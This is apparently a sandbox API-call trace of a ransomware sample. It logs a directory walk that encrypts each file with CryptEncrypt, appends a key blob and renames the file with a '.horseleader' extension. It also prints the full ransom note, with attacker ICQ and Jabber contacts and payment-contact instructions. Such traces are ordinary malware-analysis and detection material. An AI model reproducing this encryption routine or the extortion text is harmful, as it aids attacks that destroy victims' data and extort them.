[0247.430] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 80 [0247.430] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.430] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=11573) returned 1 [0247.430] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2d35, lpOverlapped=0x0) returned 1 [0247.432] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd2cb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.432] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2d35, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, 
lpNumberOfBytesWritten=0x32aeb7c*=0x2d35, lpOverlapped=0x0) returned 1 [0247.432] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.432] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.433] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.433] CloseHandle (hObject=0x1a4) returned 1 [0247.433] GetProcessHeap () returned 0x780000 [0247.433] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.433] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG.horseleader") returned 92 [0247.433] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png.horseleader")) returned 1 [0247.434] GetProcessHeap () returned 0x780000 [0247.434] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.434] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, 
ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x2d35, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.434] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.434] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\#Decrypt#.txt") returned 81 [0247.435] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.435] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0247.435] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.436] lstrlenA (lpString="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") returned 1368 [0247.437] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.437] CloseHandle (hObject=0x158) returned 1 [0247.437] GetProcessHeap () returned 0x780000 [0247.437] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.437] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59c68c90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="PAPYRUS", cAlternateFileName="")) returned 1 [0247.437] lstrcmpiW (lpString1="PAPYRUS", lpString2="Windows") returned -1 [0247.437] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS") returned 67 [0247.437] lstrcmpW (lpString1="PAPYRUS", lpString2=".") returned 1 [0247.437] lstrcmpW (lpString1="PAPYRUS", lpString2="..") returned 1 [0247.437] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.437] GetProcessHeap () returned 0x780000 [0247.437] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.437] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\*") returned 69 [0247.437] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59c68c90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.439] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.439] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\.") returned 69 [0247.439] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.439] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59c68c90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.440] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.440] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\..") returned 70 [0247.440] lstrcmpW (lpString1="..", lpString2=".") returned 1 
[0247.440] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.440] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x140f5c00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x59c68c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x140f5c00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x166d5, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PAPYRUS.ELM", cAlternateFileName="")) returned 1 [0247.440] lstrcmpiW (lpString1="PAPYRUS.ELM", lpString2="Windows") returned -1 [0247.440] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.ELM") returned 79 [0247.440] StrStrIW (lpFirst="PAPYRUS.ELM", lpSrch=".horseleader") returned 0x0 [0247.440] lstrcmpW (lpString1="PAPYRUS.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.440] lstrcmpW (lpString1="PAPYRUS.ELM", lpString2="_uninstalling_.png") returned 1 [0247.440] lstrlenW (lpString=".testttjffg") returned 11 [0247.440] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.ELM", lpSrch=".testttjffg") returned 0x0 [0247.440] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.440] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.440] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\papyrus.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.441] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.ELM") returned 79 [0247.441] StrStrW (lpFirst="PAPYRUS.ELM", lpSrch=".txt") returned 0x0 [0247.441] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=91861) returned 1 [0247.441] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.441] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.444] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.444] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.445] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x8b6a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.445] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.445] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.445] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.446] SetFilePointerEx (in: hFile=0x1a4, 
liDistanceToMove=0x116d5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.446] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.446] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.446] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.446] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.447] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.447] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.447] CloseHandle (hObject=0x1a4) returned 1 [0247.447] GetProcessHeap () returned 0x780000 [0247.447] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.447] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.ELM.horseleader") returned 91 [0247.447] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\papyrus.elm"), 
lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\papyrus.elm.horseleader")) returned 1 [0247.448] GetProcessHeap () returned 0x780000 [0247.448] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.448] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6cd64f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1f4, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PAPYRUS.INF", cAlternateFileName="")) returned 1 [0247.448] lstrcmpiW (lpString1="PAPYRUS.INF", lpString2="Windows") returned -1 [0247.448] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.INF") returned 79 [0247.449] StrStrIW (lpFirst="PAPYRUS.INF", lpSrch=".horseleader") returned 0x0 [0247.449] lstrcmpW (lpString1="PAPYRUS.INF", lpString2="#Decrypt#.txt") returned 1 [0247.449] lstrcmpW (lpString1="PAPYRUS.INF", lpString2="_uninstalling_.png") returned 1 [0247.449] lstrlenW (lpString=".testttjffg") returned 11 [0247.449] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.INF", lpSrch=".testttjffg") returned 0x0 [0247.449] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.449] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.449] CreateFileW 
(lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\papyrus.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.451] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.INF") returned 79 [0247.451] StrStrW (lpFirst="PAPYRUS.INF", lpSrch=".txt") returned 0x0 [0247.451] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=500) returned 1 [0247.451] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1f4, lpOverlapped=0x0) returned 1 [0247.453] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe0c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.453] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1f4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1f4, lpOverlapped=0x0) returned 1 [0247.453] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.453] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.453] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.453] CloseHandle (hObject=0x1a4) returned 1 [0247.454] 
GetProcessHeap () returned 0x780000 [0247.454] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.454] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.INF.horseleader") returned 91 [0247.454] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\papyrus.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\papyrus.inf.horseleader")) returned 1 [0247.458] GetProcessHeap () returned 0x780000 [0247.458] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.458] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xa0e, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.458] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.458] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 79 [0247.458] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.458] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.458] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") 
returned 1 [0247.458] lstrlenW (lpString=".testttjffg") returned 11 [0247.458] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.458] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.458] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.458] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.459] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 79 [0247.459] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.459] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2574) returned 1 [0247.459] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xa0e, lpOverlapped=0x0) returned 1 [0247.461] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff5f2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.462] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xa0e, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xa0e, lpOverlapped=0x0) returned 1 [0247.462] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0x0) returned 1 [0247.462] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.462] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.462] CloseHandle (hObject=0x1a4) returned 1 [0247.462] GetProcessHeap () returned 0x780000 [0247.463] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.463] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF.horseleader") returned 91 [0247.463] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif.horseleader")) returned 1 [0247.464] GetProcessHeap () returned 0x780000 [0247.464] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.464] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, 